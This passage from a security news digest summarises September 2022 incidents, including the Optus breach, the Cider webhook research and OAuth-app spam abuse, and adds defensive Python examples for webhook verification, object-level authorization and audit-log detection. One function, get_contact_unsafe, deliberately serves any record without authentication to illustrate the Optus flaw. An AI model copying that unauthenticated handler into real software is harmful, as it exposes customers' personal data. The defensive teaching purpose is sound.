Uncredited, Erbium Stealer Malware Report, technical report, 25 September 2022. Available online at https://www.cyfirma.com/outofband/erbium-stealer-malware-report/.
Europol Hackathon Targets Human Trafficking Networks
A hackathon hosted by the Dutch Police Academy in Apeldoorn on behalf of Europol on 6 September brought together 85 experts from 20 countries to focus on combating criminal networks that use social media, the public web and the dark web to conduct human trafficking for sexual or labour exploitation. It is relatively easy to identify trafficking of drugs or weapons online, but the indicators of online activity in human trafficking are more subtle and challenging, so the investigators gathered criminal intelligence to determine these indicators and, in particular, to target human traffickers attempting to lure Ukrainian refugees.
The traffickers will attempt to hijack social media platforms, online dating apps, advertising and aid platforms, messaging apps, forums and private groups in order to lure their victims while evading detection by law enforcement. The hackathon was a success:
- 114 online platforms monitored in total, of which 30 were related to vulnerable Ukrainian refugees;
- 53 online platforms suspected of links to human trafficking checked, of which 10 were related to vulnerable Ukrainian refugees;
- Five online platforms linked to human trafficking checked, of which four were related to child sexual exploitation on the dark web;
- 11 suspected human traffickers identified, 5 of whom were linked to trafficking of human beings, and specifically to vulnerable Ukrainian citizens;
- 45 possible victims identified, 25 of whom were of Ukrainian nationality;
- 20 platforms with possible links to trafficking of human beings identified for further investigation and monitoring;
- 80 persons/user names checked, out of which 30 were related to possible exploitation of vulnerable Ukrainian citizens.
This is a useful reminder that our work in the online world often has deeper consequences for victims in the real world.
Belanger, Ashley, Hackathon finds dozens of Ukrainian refugees trafficked online, Ars Technica, 23 September 2022. Available online at https://arstechnica.com/tech-policy/2022/09/hackathon-finds-dozens-of-ukrainian-refugees-trafficked-online/.
Damned If You Do, Damned If You Don't
Illustrating the particularly nasty nature of ransomware extortions, the hackers who compromised systems at the Centre Hospitalier Sud Francilien hospital in Corbeil-Essonne near Paris have now responded to the authorities' refusal to pay a ransom demand by leaking patient information online.
The hospital was hit one weekend in August, with all their major systems disabled by LockBit ransomware, requiring patients to be sent elsewhere and major surgeries to be postponed. The attackers demanded payment of $US10 million to unlock the data, and threatened to release all the information they had exfiltrated - which they have now done.
The data includes the French equivalent to social security numbers as well as examination reports, test results and more, and could impact patients but also doctors, staff and employees of partners such as laboratories.
Stahie, Silviu, Hackers Release Stolen Data after French Hospital Refuses to Pay Decryption Ransom, Bitdefender HotForSecurity blog, 27 September 2022. Available online at https://www.bitdefender.com/blog/hotforsecurity/hackers-release-stolen-data-after-french-hospital-refuses-to-pay-decryption-ransom/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
 Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
News Stories
CI/CD Pipelines Exposed Via Source Code Repository Webhooks
A fascinating PoC developed by Cider Security shows how DevOps software deployment pipelines can be compromised by webhooks they expose so that cloud SaaS source code management systems can trigger internal build events.
Enterprises often establish internal build/test/deploy pipelines using automation servers like Jenkins (https://www.jenkins.io/), but make use of cloud-hosted source code repositories like GitHub and GitLab. In order to automatically push commits from the source repository to the deployment pipeline, these systems support webhooks which trigger actions on the automation server by POSTing a request to a RESTful API. But for this to work, the enterprise firewalls must accept inbound HTTP requests from a particular range of IP addresses owned by the repository.
A complicating factor is that automation servers are often seen as well-protected since they are well inside the firewall, but they also have a large number of poorly-maintained plugins and can remain unpatched for long periods. If an attacker can a) find an exposed automation server endpoint and b) get the source repository to send cunningly-crafted payloads, then they have opened a door to brute-forcing credentials and then executing Jenkins commands. All kinds of interesting possibilities then follow: compromising code deployed to production systems, pivoting to attack other systems or even arbitrary remote command execution.
It's not easy - but Cider have shown that - and how - it can be done. Time to take a closer look at those CI/CD pipelines.
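The defensive counterpart to the Cider research is to treat every webhook delivery as untrusted until it passes a chain of checks. The following is an added example (not Cider Security's PoC, nor Jenkins code): it assumes the repository host signs each delivery with HMAC-SHA256 over the raw body using a shared secret carried in an X-Hub-Signature-256 header (GitHub's scheme) and publishes the IP ranges it sends from; the ranges, secret and repository name below are constructed placeholders.

```python
"""Gate repository webhook deliveries before a CI server acts on them.

Added example, not Cider Security's PoC or Jenkins code. It assumes the
repository host signs each delivery with HMAC-SHA256 over the raw body using a
shared secret, carried in an X-Hub-Signature-256 header (GitHub's scheme), and
publishes the IP ranges it sends from. The ranges and secret below are
constructed placeholders.
"""
import hashlib
import hmac
import ipaddress
import json
from typing import Dict, Optional, Tuple

# Constructed allow-list standing in for the repository host's published ranges.
ALLOWED_SOURCE_CIDRS = [ipaddress.ip_network("192.0.2.0/24"),
                        ipaddress.ip_network("198.51.100.0/24")]
WEBHOOK_SECRET = b"constructed-shared-secret"   # lives in the CI server's secret store
MAX_BODY_BYTES = 256 * 1024


def source_allowed(remote_ip: str) -> bool:
    """Network gate: the firewall allow-list the story mentions, re-checked in the app."""
    addr = ipaddress.ip_address(remote_ip)
    return any(addr in net for net in ALLOWED_SOURCE_CIDRS)


def sign(body: bytes, secret: bytes = WEBHOOK_SECRET) -> str:
    """Header value a legitimate sender attaches: HMAC-SHA256 over the raw body."""
    return "sha256=" + hmac.new(secret, body, hashlib.sha256).hexdigest()


def signature_valid(body: bytes, header: Optional[str], secret: bytes = WEBHOOK_SECRET) -> bool:
    """Recompute the signature and compare in constant time; reject if absent."""
    if not header or not header.startswith("sha256="):
        return False
    return hmac.compare_digest(sign(body, secret), header)


def accept_delivery(remote_ip: str, headers: Dict[str, str], body: bytes,
                    expected_repo: str) -> Tuple[bool, str]:
    """Apply every gate in order: source range, size, signature, payload sanity.

    Returns (accepted, reason). Only a delivery that passes all four should be
    handed to the build trigger: an IP allow-list alone does not stop a crafted
    payload that is relayed through the repository host itself.
    """
    if not source_allowed(remote_ip):
        return False, "source IP outside repository host ranges"
    if len(body) > MAX_BODY_BYTES:
        return False, "body too large"
    if not signature_valid(body, headers.get("X-Hub-Signature-256")):
        return False, "bad or missing signature"
    try:
        payload = json.loads(body)
    except json.JSONDecodeError:
        return False, "body is not JSON"
    # Pin the endpoint to the one repository it was registered for: a correctly
    # signed delivery naming some other repository is still not one to build.
    repo = payload.get("repository", {}) if isinstance(payload, dict) else {}
    if not isinstance(repo, dict) or repo.get("full_name") != expected_repo:
        return False, "payload names an unexpected repository"
    return True, "ok"


if __name__ == "__main__":
    body = json.dumps({"ref": "refs/heads/main",
                       "repository": {"full_name": "example-org/app"}}).encode()
    headers = {"X-Hub-Signature-256": sign(body)}
    print(accept_delivery("192.0.2.10", headers, body, "example-org/app"))        # (True, 'ok')
    print(accept_delivery("192.0.2.10", headers, body + b" ", "example-org/app"))  # signature fails
```

The signature check is what makes the IP allow-list meaningful: without it, anything the repository host can be induced to send is accepted as a legitimate build trigger.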
Gil, Omer and Asi Greenholts, How we Abused Repository Webhooks to Access Internal CI Systems at Scale, blog post, 20 September 2022. Available online at https://www.cidersecurity.io/blog/research/how-we-abused-repository-webhooks-to-access-internal-ci-systems-at-scale/.
Morgan Stanley Insecure Asset Disposal Attracts $35 Million Fine
Financial services company Morgan Stanley has been fined $US35 million by the Securities and Exchange Commission for "extensive failures to protect the personal identifying information of approximately 15 million customers". The company agreed to the payment in order to escape a court process which might have had a worse outcome.
In point of fact, Morgan Stanley didn't actually dispose of the old hard drives and network caching devices itself - it had contracted another company to take care of the task. But the company failed to promulgate adequate policies for equipment retirement and data destruction, did not manage the selection of a contractor to perform the task, and had inadequate procedures for assuring secure destruction by the contractor.
Full details are in the administrative proceeding file, linked below, which makes fascinating - and essential - reading.
The lessons are clear:
- You can outsource or delegate responsibility for some security-related functions, but you can't escape accountability and liability
- Device retirement policies should require secure destruction, rather than over-writing and reselling, for media that contains sensitive data, especially PII
- Full-device encryption can aid with compliance, as long as keys are correctly managed
- PII that escapes can show up years later, with expensive consequences
Uncredited, Morgan Stanley Smith Barney to Pay $35 Million for Extensive Failures to Safeguard Personal Information of Millions of Customers, press release, 20 September 2022. Available online at https://www.sec.gov/news/press-release/2022-168.
United States of America v. Morgan Stanley Smith Barney LLC (respondent), Administrative Proceeding File No. 3-21112, 20 September 2022. Available online at https://www.sec.gov/litigation/admin/2022/34-95832.pdf.
Russian Groups Ramp Up Attacks
As the Russia/Ukraine conflict seems likely to enter a new phase, Ukrainian Defence Intelligence has warned that Russia is preparing massive cyberattacks on critical infrastructure facilities of Ukraine and its allies. Western countries are likely to be collateral damage, if not direct targets, in these campaigns.
Mandiant is tracking multiple self-proclaimed hacktivist groups working for Russia, primarily conducting DDoS attacks and leaking stolen data. Such groups, although claiming independence, seem to be working closely with, or are simply a front for, the Russian state.
The moderators of three Telegram channels - "XaKNet Team", "Infoccentr" and "CyberArmyofRussia_Reborn" - are using GRU-sponsored APT28 (Fancy Bear) tools on Ukrainian victims' networks, leaking their data within 28 hours of wiping activity by APT28.
Meanwhile, Cluster25 researchers have analyzed an infected PowerPoint file which an APT28-affiliated group is using to implant a variant of Graphite malware. The attack relies on a code execution technique which is triggered when the user enters presentation mode and then moves the mouse - this then runs a PowerShell script which downloads and executes a dropper from OneDrive, which in turn downloads and injects the Graphite variant.
Cluster25 Threat Intel Team, In the footsteps of the Fancy Bear: PowerPoint mouse-over event abused to deliver Graphite implants, blog post, 23 September 2022. Available online at https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/.
Defence Intelligence of Ukraine, !! The occupiers are preparing massive cyberattacks ..., tweet 26 September 2022. Available online at https://twitter.com/DI_Ukraine/status/1574324482277363714.
Mandiant Intelligence, GRU: Rise of the (Telegram) MinIOns, blog post, 23 September 2022. Available online at https://www.mandiant.com/resources/blog/gru-rise-telegram-minions.
Russian Botmaster Requests Extradition to the US
The likely operator of the RSOCKS botnet, 36-year-old Russian national Denis Emelyantsev, a.k.a. Denis Kloster, has been arrested in Bulgaria at the request of US authorities, reports Brian Krebs. In a novel twist, he requested, and was granted, extradition to the US, apparently telling the judge, "America is looking for me because I have enormous information and they need it".
A cynical observer might observe that whether or not he has "enormous information", Russian President Vladimir Putin has instituted a massive conscription program, and this might have factored in his decision.
Krebs, Brian, Accused Russian RSOCKS Botmaster Arrested, Requests Extradition to U.S., blog post, 23 September 2022. Available online at https://krebsonsecurity.com/2022/09/accused-russian-rsocks-botmaster-arrested-requests-extradition-to-u-s/.
News Stories
Uber & Rockstar GTA Hacker Arrested
The City of London Police has revealed that it has arrested a 17-year-old from Oxfordshire on suspicion of hacking. It is believed that the real-world identity of the hacker, who went by the handles 'teapot' and 'teapotuberhacker', was outed in an online forum, giving the police the information they needed to act.
If this is correct, the teenager also hacked Microsoft, Rockstar Games and Uber and may well be 'White' or 'Breachbase', the ringleader of the Lapsus$ extortion group. This group has mainly employed social engineering attacks on employee accounts for initial access, but then employs increasingly sophisticated technical techniques for lateral movement. They have also attempted to recruit privileged insiders at telcos, tech companies and callcenters, bribing them to provide VPN or Citrix credentials.
City of London Police, On the evening of Thursday 22 September ..., tweet, 23 September 2022. Available online at https://twitter.com/CityPolice/status/1573281533665972225.
Flashpoint Team, What We Know About the 'Grand Theft Auto VI' Data Breach, blog article, 23 September 2022. Available online at https://flashpoint.io/blog/grand-theft-auto-6-data-breach/.
Optus Data Breach Resonates
The massive data breach of Australian telco Optus continues to resonate, with ongoing implications for the telco, its customers and regulators. The hacker behind the breach has apparently now demanded a $US1 million ransom - which, considering the number of records, amounts to just over 10c per record. Local journalist Jeremy Kirk has been in touch with the alleged hacker and confirmed the authenticity of a sample of the data with the affected customers.
The hacker claims that they obtained access via an API endpoint which required no authentication - a classic function-level authorization vulnerability - enumerating a field called 'contactid' to access customer records sequentially.
Because the customer data contains so much information that can be used for identity theft, the Government is considering changes to privacy laws which will speed the disclosure of such information to banks so that the financial institutions can apply additional monitoring and controls on the accounts of the affected customers. Considering that it is the existing privacy laws that prevent this type of disclosure, the government might wish to pause for reflection on the Law of Unintended Consequences before pushing through any half-baked ideas.
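The unauthenticated endpoint enumerable by 'contactid' is the textbook broken object-level authorization case. As an added example (not Optus code), the block below shows the hardened handler a defender would want, which authenticates the caller and then checks that the requested object belongs to them, and a log-based check that surfaces the sequential-id walk such a breach leaves in access logs. The record store, session table and access log format are constructed; only the field name 'contactid' comes from the report.

```python
"""Object-level authorization on a customer-record endpoint, plus a log-based
check for the sequential 'contactid' enumeration described above.

Added example, not Optus code. The records, the token-to-user table and the
access log format are constructed; the field name 'contactid' is from the report.
"""
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed customer records keyed by contactid; 'owner' is the account that may read it.
RECORDS = {1001: {"owner": "alice", "name": "Alice", "licence": "LIC-1"},
           1002: {"owner": "bob", "name": "Bob", "licence": "LIC-2"},
           1003: {"owner": "carol", "name": "Carol", "licence": "LIC-3"}}
# Constructed bearer-token to user mapping standing in for real session handling.
SESSIONS = {"tok-alice": "alice", "tok-bob": "bob"}


def get_contact_unsafe(contactid: int) -> Optional[dict]:
    """The failure pattern: no caller identity is established, so any id is served."""
    return RECORDS.get(contactid)


def get_contact(contactid: int, token: Optional[str]) -> Tuple[int, Optional[dict]]:
    """Hardened handler: authenticate, then check the object belongs to the caller.

    Returns (status, body). Forbidden and not-found both answer 404, so the
    response cannot be used as an oracle for which ids exist.
    """
    user = SESSIONS.get(token or "")
    if user is None:
        return 401, None
    record = RECORDS.get(contactid)
    if record is None or record["owner"] != user:
        return 404, None
    return 200, {k: v for k, v in record.items() if k != "owner"}


# Constructed access log lines: "<client_ip> <status> GET /api/contacts/<contactid>"
ACCESS_LOG = """203.0.113.7 200 GET /api/contacts/1001
203.0.113.7 200 GET /api/contacts/1002
203.0.113.7 200 GET /api/contacts/1003
203.0.113.7 200 GET /api/contacts/1004
203.0.113.7 200 GET /api/contacts/1005
198.51.100.2 200 GET /api/contacts/2048
198.51.100.2 200 GET /api/contacts/2048"""


def enumeration_suspects(log_text: str, min_run: int = 4) -> Dict[str, int]:
    """Flag clients whose requested ids form a consecutive run of at least min_run.

    A genuine customer re-reads one record; walking ids one after another is
    the signature of bulk extraction. Returns {client_ip: longest_run}.
    """
    ids_by_client: Dict[str, List[int]] = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[3].startswith("/api/contacts/"):
            continue
        try:
            ids_by_client[parts[0]].append(int(parts[3].rsplit("/", 1)[1]))
        except ValueError:
            continue  # non-numeric id: not part of a sequential walk
    suspects: Dict[str, int] = {}
    for client, ids in ids_by_client.items():
        run = longest = 1
        for prev, cur in zip(ids, ids[1:]):
            run = run + 1 if cur == prev + 1 else 1
            longest = max(longest, run)
        if longest >= min_run:
            suspects[client] = longest
    return suspects


if __name__ == "__main__":
    print(get_contact(1001, "tok-alice"))   # (200, {'name': 'Alice', 'licence': 'LIC-1'})
    print(get_contact(1002, "tok-alice"))   # (404, None): not alice's record
    print(enumeration_suspects(ACCESS_LOG))  # {'203.0.113.7': 5}
```

Rate limiting on the endpoint would slow the walk down, but the authorization check is what actually closes it; the log check is there for the case where a service was exposed before the check existed.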
Belot, Henry, Australian Federal Police monitoring dark web amid allegations stolen Optus data may be sold online, ABC News, 24 September 2022. Available online at https://www.abc.net.au/news/2022-09-24/afp-monitoring-dark-web-for-stolen-optus-data-sold-online/101471256.
Kirk, Jeremy, UPDATE: I reached the person who claims to have hacked Optus, tweet, 24 September 2022. Available online at https://twitter.com/jeremy_kirk/status/1573652986437726208.
Speers, David and Andrew Greene, Federal government to unveil new security measures following massive Optus data breach, ABC News, 25 September 2022. Available online at https://www.abc.net.au/news/2022-09-25/new-security-measures-to-be-unveiled-following-optus-data-breach/101472364.
XSS, CSRF Vulns in Netlify JavaScript Library
Web sites built with the Netlify development platform are vulnerable to cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks, due to a cache poisoning vulnerability (CVE-2022-39239), say researchers. The vulnerability allows attackers to use specially crafted headers which cause the cache handler to load and return arbitrary images - which could include scalable vector graphics (SVG) files carrying embedded malicious scripts.
The vulnerability is due to improper URL parsing in the unjs/ufo library which is, in turn, used by the @netlify/ipx library. This is installed by default on many Netlify installations.
Netlify versions prior to 1.2.3 are vulnerable, and customers are - obviously - urged to update and redeploy sites to clear caches.
Curry, Sam, Exploiting Web3's Hidden Attack Surface: Universal XSS on Netlify's Next.js Library, blog post, 21 September 2022. Available online at https://samcurry.net/universal-xss-on-netlifys-next-js-library/.
Course Updates
Course materials updated in the last few days:
Updated Lecture Slides
Updated CISSP CBK wiki pages:
- CBK Wiki/RESTful API
- CBK Wiki/Simple Object Access Protocol
- CBK Wiki/XML-RPC
- CBK Wiki/Broken Object-Level Authorization
- CBK Wiki/JSON Web Token
- CBK Wiki/Federated Identity Management Systems
- CBK Wiki/Software Development for Mobile Devices
- CBK Wiki/Excessive Data Exposure
- CBK Wiki/Sensitive Data Exposure
- CBK Wiki/Broken Function-Level Authorization
- CBK Wiki/Injection Attacks
- CBK Wiki/Lack of Resources and Rate Limiting
- CBK Wiki/Mass Assignment
- CBK Wiki/Improper Web API Asset Management
- CBK Wiki/Insufficient Logging and Monitoring
- CBK Wiki/API Security
- CBK Wiki/API key
- CBK Wiki/Broken User Authentication
- CBK Wiki/Web Application Security
- CBK Wiki/Cross-Site Request Forgery
- CBK Wiki/Polymorphism
- CBK Wiki/Inheritance
- CBK Wiki/Encapsulation
- CBK Wiki/Object-Oriented Concepts and Security
News Stories
Exchange Servers Compromised For Spamming
Microsoft is warning of an attack which compromises cloud-hosted Exchange servers by installing a malicious OAuth application which then enables the attacker to send spam emails which appear to be from the victim's domain.
Initial access is achieved by a credential stuffing attack, based on a dump of existing credentials, in order to gain access to an admin account which did not have multi-factor authentication enabled (which would have prevented the attack). Once this was achieved, the attacker probably ran a PowerShell script to register a new application, grant it the Exchange.ManageAsApp permission with admin consent, give it global admin and Exchange admin roles and then add some credentials which will allow them to maintain control.
This app was then used to create a new inbound connector and transport rules in Exchange. This allowed the threat actor to then conduct a high-volume spam campaign, intended to trick recipients into providing credit card details and signing up for a recurring subscription service - a fairly obvious scam, but one that still works well enough.
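Each step of this chain leaves a tenant audit record, and the detection opportunity is to correlate them rather than alert on any one in isolation. The block below is an added example, not Microsoft's detection logic: the audit records are constructed and only loosely modelled on an audit log export, and the field names (Time, UserId, Operation, Target, Permission) and operation strings are assumptions rather than a vendor schema; the permission name Exchange.ManageAsApp and the connector/transport-rule steps are from the report.

```python
"""Correlate the stages of the malicious-OAuth-app chain described above in
tenant audit records, so the whole sequence surfaces as one finding.

Added example, not Microsoft's detection logic. The records are constructed
and only loosely modelled on an audit log export; the field names (Time,
UserId, Operation, Target, Permission) and the operation strings are
assumptions, not a vendor schema. The permission name Exchange.ManageAsApp
and the connector/transport-rule steps are from the report.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed records: one admin registers an app, grants it Exchange.ManageAsApp,
# adds a credential, and the app then creates a connector and a transport rule.
AUDIT: List[Dict[str, str]] = [
    {"Time": "2022-09-15T10:00:00", "UserId": "ops@example.test",
     "Operation": "New-TransportRule", "Target": "Rule-0"},          # benign noise
    {"Time": "2022-09-20T02:01:00", "UserId": "admin@example.test",
     "Operation": "Add application", "Target": "spamapp"},
    {"Time": "2022-09-20T02:02:10", "UserId": "admin@example.test",
     "Operation": "Add app role assignment", "Target": "spamapp",
     "Permission": "Exchange.ManageAsApp"},
    {"Time": "2022-09-20T02:03:00", "UserId": "admin@example.test",
     "Operation": "Add app credential", "Target": "spamapp"},
    {"Time": "2022-09-20T02:20:00", "UserId": "spamapp",
     "Operation": "New-InboundConnector", "Target": "Connector-1"},
    {"Time": "2022-09-20T02:21:00", "UserId": "spamapp",
     "Operation": "New-TransportRule", "Target": "Rule-1"},
]

# Assumed operation strings mapped to the stage of the chain they represent.
STAGE_OF_OP = {
    "Add application": "registered",
    "Add app role assignment": "granted",
    "Add app credential": "credential",
    "New-InboundConnector": "connector",
    "New-TransportRule": "transport_rule",
}
TENANT_STAGES = {"registered", "granted", "credential"}   # the app is the Target here
WINDOW = timedelta(hours=24)


def _ts(rec: Dict[str, str]) -> datetime:
    return datetime.fromisoformat(rec["Time"])


def find_app_abuse_chains(records, window: timedelta = WINDOW) -> Dict[str, dict]:
    """Report each app that was granted Exchange.ManageAsApp and then, acting as
    itself, created an inbound connector or transport rule within the window.

    A transport rule on its own is routine admin work; the grant followed by the
    app's own mail-flow changes is what distinguishes this chain.
    """
    by_app = defaultdict(list)
    for rec in sorted(records, key=_ts):
        stage = STAGE_OF_OP.get(rec["Operation"])
        if stage is None:
            continue
        if stage == "granted" and rec.get("Permission") != "Exchange.ManageAsApp":
            continue
        # Tenant-level operations name the app as Target; Exchange operations
        # performed by the app appear with the app itself as UserId.
        app = rec["Target"] if stage in TENANT_STAGES else rec["UserId"]
        by_app[app].append((stage, _ts(rec), rec["UserId"]))

    findings: Dict[str, dict] = {}
    for app, events in by_app.items():
        stages = {s for s, _, _ in events}
        if "granted" not in stages or not stages & {"connector", "transport_rule"}:
            continue
        times = [t for _, t, _ in events]
        if max(times) - min(times) > window:
            continue
        findings[app] = {
            "stages": sorted(stages),
            "first_seen": min(times).isoformat(),
            # The account that set the app up: in the report, the admin without MFA.
            "granting_admins": sorted({u for s, _, u in events if s in TENANT_STAGES}),
        }
    return findings


if __name__ == "__main__":
    for app, detail in find_app_abuse_chains(AUDIT).items():
        print(app, detail)
```

The granting account named in each finding is the one to check for missing MFA and for the credential-stuffing sign-ins that preceded the chain.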
Microsoft 365 Defender Research Team, Malicious OAuth application used to compromise email servers and spread spam, blog article, 22 September 2022. Available online at https://www.microsoft.com/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/.
NSA, CISA Advise on OT & ICS Defence
The National Security Agency and Cybersecurity & Infrastructure Security Agency have issued a joint alert providing guidance on security for Operational Technology (OT) and Industrial Control Systems (ICS). These systems monitor and control industrial processes - power stations, refineries, steel mills, but also air conditioning plant for office buildings, ovens for small bakeries and water treatment plants - which collectively are essential to . . . everything. Disrupting their operation can lead to outcomes from mild annoyance through political and economic gains to physical destruction and loss of life.
The alert provides guidance on the TTP's and overall game plan of threat actors targeting OT/ICS, as well as a suggested approach to the development of mitigation strategies.
NSA/CISA, Control System Defense: Know the Opponent, Alert AA22-265A, 22 September 2022. Available online at https://www.cisa.gov/uscert/ncas/alerts/aa22-265a.
Zoho ManageEngine Exploit in the Wild
A remote command execution vulnerability (CVE-2022-35405) in Zoho ManageEngine Access Manager Plus (version 4302 and earlier), Password Manager Pro (version 12100 and earlier) and PAM360 (version 5500 and earlier) is being actively exploited in the wild and has been added to CISA's Known Exploited Vulnerabilities Catalog.
The insecure object deserialization vulnerability, in a Java XMLRPC parser, is of critical severity, and customers are advised to update their installations as soon as possible.
Uncredited, ManageEngine PAM360, Password Manager Pro, and Access Manager Plus remote code execution vulnerability, security advisory, September 2022. Available online at https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html.
Metador Mystery Threat Actor
Researchers at SentinelLabs have discovered a previously-unseen threat actor which is primarily targeting telcos, ISP's and universities in the Middle East and Africa. The group, which they christened 'Metador', has deployed sophisticated malware which makes use of antiforensics techniques to evade detection and LOLbins to deploy malware directly into memory.
The origin of the malware is unclear - linguistic analysis points to multiple developers speaking both English and Spanish, with references to British pop punk lyrics and Argentinian political cartoons - but since the cyberespionage is focused on the Middle East and Africa, it is possible the development of the malware was contracted out by a state agency.
Guerrero-Saade, Juan Andrés et al., The Mystery of Metador | An Unattributed Threat Hiding in Telcos, ISPs, and Universities, technical report, 22 September 2022. Available online at https://www.sentinelone.com/labs/the-mystery-of-metador-an-unattributed-threat-hiding-in-telcos-isps-and-universities/.
News Stories
German General Data Retention Rule Violates EU Law
Attempts by European governments to proactively collect data in case it turns out to be useful in counter-terrorism investigations have taken a serious hit, with the European Union's Court of Justice ruling that such blanket collection of data can only be done in circumstances where there is a serious threat to national security.
The ruling illustrates the tension between governments' desire to make use of massive data collection and analytics in the name of national security and public safety, and citizens increasing concerns over personal privacy, especially in light of several countries' swing towards authoritarianism.
The ruling is the result of a case brought by Deutsche Telekom and ISP SpaceNet AG, challenging the German data retention law. Of course, the tech companies are less motivated by concerns for their customers' privacy and more by the burdensome costs of collecting and storing all that data.
Chee, Foo Yun, Germany's blanket data retention law is illegal, EU top court says, Reuters, 20 September 2022. Available online at https://www.reuters.com/technology/indiscriminate-data-retention-is-illegal-eu-top-court-says-2022-09-20/.
Enhancements in Windows 11 22H2 Security Baseline
Microsoft has released their security configuration baseline settings for Windows 11 22H2, adding a number of security improvements. Top of these has to be additional hardware-based protection against stack-smashing and return-oriented/jump-oriented programming attacks for machines that use Intel's Control-flow Enforcement Technology or similar shadow stacks. The new feature, called Kernel Mode Hardware-enforced Stack Protection, also requires Virtualization Based Protection of Code Integrity (HVCI) to be enabled.
Other enhancements include enhanced phishing protection, including detection of the reuse of enterprise passwords on other applications or web sites and credential theft protection by blocking the loading of custom security support and authentication providers into the Local Security Authority Subsystem Service (LSASS) - a technique used by some credential stealers. The update also allows Administrator accounts to be locked in the event of brute-force attacks.
The new baseline can be downloaded using the Microsoft Security Compliance Toolkit found at https://www.microsoft.com/en-us/download/details.aspx?id=55319. 
Munck, Rick, Windows 11, version 22H2 Security baseline, Microsoft Security Baselines Blog, 20 September 2022. Available online at https://techcommunity.microsoft.com/t5/microsoft-security-baselines/windows-11-version-22h2-security-baseline/ba-p/3632520.
EU Proposes Stricter Regulation of Software and IoT Devices
Back to the EU, which has laid out its proposals for a new regulation, called the Cyber Resilience Act, which will regulate security of both digital hardware and software products. The legislators claim that an estimated annual cost of €5.5 trillion is down to two major problems with these products:
- A low level of cybersecurity, stemming from widespread vulnerabilities and no way to patch them, and
- Insufficient understanding and access to security information by users, leading them to choose insecure products and use them in an insecure fashion.
The Act will broaden the scope of existing legislation to cover non-embedded software and some hardware products which are not currently in scope, and aims to encourage the development of secure products and a market in which purchasers are adequately informed to take cybersecurity into account when selecting and using products.
Uncredited, Cyber Resilience Act, Policy and Legislation proposal, 15 September 2022. Available online at https://digital-strategy.ec.europa.eu/en/library/cyber-resilience-act.
Australia Plans Restrictions on Online Content
Still on the subject of proposed legislation, Australian enterprises may find themselves unexpectedly affected by changes in the industry codes relating to the Online Safety Act. The changes are intended to regulate what is described - and determined - by the eSafety Commissioner as "harmful online content". This is broken up into "Class 1" material, which is essentially material that would be refused classification under the National Classification Scheme, and "Class 2", which would be X18+ or R18+ materials. Class 1 is further subdivided, according to the nature of the offensive material.
Industry groups point to several problems with this approach. First, the classification scheme is - perhaps by necessity - somewhat vague, and can encompass some materials which are legal to create, distribute and possess. Secondly, while classification is definitely done for movies released to theatres, it is not practical to do this for every piece of material floating around the Internet.
Furthermore, the use of automated approaches to the detection of harmful content could seriously impact privacy, while manual review could prove even worse.
Bogle, Ariel, Australia's changing how it regulates the internet - and no-one's paying attention, ABC News, 21 September 2022. Available online at https://www.abc.net.au/news/science/2022-09-21/internet-online-safety-act-industry-codes/101456902.
Domain Shadowing Borrows Reputation for C2 Servers
Palo Alto Networks' Unit 42 researchers have documented a new tactic employed by cybercriminals in order to maintain their C2 domains by borrowing the reputation of legitimate enterprises. The tactic works by compromising the domain name servers of a legitimate business and then creating malicious subdomains. Because the legitimate domain names have existed for some years, they have established a good reputation in threat intelligence databases, and because this tactic does not affect the enterprise's other systems, it is likely to pass completely unnoticed.
Unit 42 built an automated pipeline which uses machine learning to analyze passive DNS traffic logs, detecting over 12,000 such shadowed domains between late April and late June of this year. Of these, only 200 were marked as malicious by vendors in VirusTotal. In one example, the operators of a phishing campaign had shadowed domains in the AU and US TLD's, and their shadowed domains had IP addresses located in Russia.
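The heuristics Unit 42 describes can be applied on a small scale to an organisation's own passive DNS data: an apex domain registered years ago that suddenly gains new subdomains pointing at hosting the apex has never used. The block below is an added example, not Unit 42's pipeline or a machine-learning model: the passive DNS observations, the domain-age table and the IP-to-country/ASN table are all constructed, and a real pipeline would use the Public Suffix List rather than the lookup table used here to find the registrable apex.

```python
"""Flag candidate shadowed subdomains in passive DNS, following the heuristics
summarised above: an old, reputable parent domain suddenly gains new
subdomains whose addresses sit in hosting the parent has never used.

Added example, not Unit 42's pipeline. The passive DNS records, the domain-age
table and the IP-to-country/ASN table are constructed.
"""
from collections import defaultdict
from datetime import date
from typing import Dict, List, Tuple

# Constructed passive DNS observations: (first_seen, fqdn, rrtype, rdata).
PDNS: List[Tuple[str, str, str, str]] = [
    ("2015-03-01", "example-shop.com.au", "A", "203.0.113.10"),
    ("2015-03-01", "www.example-shop.com.au", "A", "203.0.113.10"),
    ("2016-06-12", "mail.example-shop.com.au", "A", "203.0.113.12"),
    ("2022-05-02", "login-secure.example-shop.com.au", "A", "198.51.100.77"),
    ("2022-05-02", "verify-account.example-shop.com.au", "A", "198.51.100.78"),
    ("2022-05-09", "cdn7.example-shop.com.au", "A", "198.51.100.79"),
    ("2021-11-20", "fresh-startup.io", "A", "192.0.2.5"),
    ("2022-05-03", "app.fresh-startup.io", "A", "192.0.2.6"),
]
# Constructed enrichment: apex registration dates and IP -> (country, ASN).
DOMAIN_AGE = {"example-shop.com.au": "2011-09-14", "fresh-startup.io": "2021-11-18"}
IP_INFO = {"203.0.113.10": ("AU", "AS64496"), "203.0.113.12": ("AU", "AS64496"),
           "198.51.100.77": ("RU", "AS64511"), "198.51.100.78": ("RU", "AS64511"),
           "198.51.100.79": ("RU", "AS64511"),
           "192.0.2.5": ("US", "AS64500"), "192.0.2.6": ("DE", "AS64501")}


def apex_of(fqdn: str) -> str:
    """Registrable apex of fqdn, using the constructed DOMAIN_AGE table as the
    authority (a real pipeline would consult the Public Suffix List)."""
    labels = fqdn.split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
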